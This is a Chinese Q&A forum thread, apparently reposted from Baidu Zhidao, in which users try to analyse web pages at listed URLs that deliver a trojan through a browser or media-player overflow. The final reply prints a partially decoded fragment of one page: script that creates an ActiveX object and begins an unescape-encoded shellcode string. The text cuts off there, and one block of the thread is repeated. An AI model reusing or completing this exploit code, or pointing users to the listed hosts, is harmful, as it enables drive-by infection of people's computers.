UC知道高手来分析一下,这个是什么马
来源:百度知道 编辑:UC知道 时间:2024/05/31 15:12:21
注意,如果你的补丁不全,请勿直接访问,后果自负
http://xxx.phppp.us/ceshi/lz.htm
http://xxx.phppp.us/ceshi/real.htm
http://xxx.phppp.us/ceshi/614.htm(可能是06014)
http://xxx.phppp.us/104.htm
请告诉我这些网址溢出后要下载的exe文件的url
或者有什么其他企图
废话,肯定是木马。
谁能告诉我lz.htm用的是什么加密方式,不要再回答什么 是木马 什么的了。
----------------------------------------
第二层是unescape的加密了。real那个文件的shellcode好象是靠暴风或者realone执行的。
我再想想看,unescape怎么解密。
http://xxx.phppp.us/ceshi/lz.htm
http://xxx.phppp.us/ceshi/real.htm
http://xxx.phppp.us/ceshi/614.htm(可能是06014)
http://xxx.phppp.us/104.htm
请告诉我这些网址溢出后要下载的exe文件的url
或者有什么其他企图
废话,肯定是木马。
谁能告诉我lz.htm用的是什么加密方式,不要再回答什么 是木马 什么的了。
----------------------------------------
第二层是unescape的加密了。real那个文件的shellcode好象是靠暴风或者realone执行的。
我再想想看,unescape怎么解密。
我在一个网站上发现了第二个 好像在后台运行暴风影音 带隐藏参数 不过偶没运行就是了 估计是利用前些日子暴出的暴风影音漏洞种马的工具
第一个网页第一层是usascii加密
解密后如下 好像还有加密
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title></title>
</head><body>
<script>
document.writeln("<script>");
document.writeln("document.writeln(\"<html><object id=\\\'GentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelVChenziGentLovelV\\\' classid=\\\"clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69\\\"><\\\/object><SCRIPT language=\\\"javascript\\\">var ChenziN=window[\\\"unescape\\\"](\\\"